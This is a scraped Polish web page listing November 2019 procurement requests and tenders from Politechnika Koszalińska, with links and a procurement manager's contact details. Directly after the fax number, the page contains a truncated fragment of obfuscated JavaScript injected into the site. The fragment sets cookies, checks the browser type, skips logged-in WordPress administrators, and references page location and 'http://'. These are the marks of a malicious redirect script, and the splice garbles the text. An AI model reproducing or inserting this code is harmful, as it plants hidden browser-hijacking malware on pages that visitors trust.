Politechnika – zapytania ofertowe i przetargi listopad 2019 | Północna Izba Gospodarcza w Koszalinie

1) zapytania ofertowe na:

– dostawę optycznego systemu pomiaru kąta zwilżania oraz energii powierzchniowej – Goniometr:

http://bip.tu.koszalin.pl/26706/26706/art28499.html

– sukcesywną dostawę artykułów higienicznych i gospodarczych:

http://bip.tu.koszalin.pl/26706/26706/art28509.html

2) postępowania przetargowe na:

– dostawę Drukarki 3D do wytwarzania części z proszków metalicznych:

http://bip.tu.koszalin.pl/13091,13620/13620/art20857.html

– dostawę sprzętu komputerowego dla Politechniki Koszalińskiej:

http://bip.tu.koszalin.pl/13091,13620/13620/art20847.html

Pozdrawiam,


Adam Brzycki
Kierownik Działu Zamówień

Politechnika Koszalińska
ul. Śniadeckich 2
75-453 Koszalin
tel. 94-34-78-650/682
fax 94-34-78-649 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m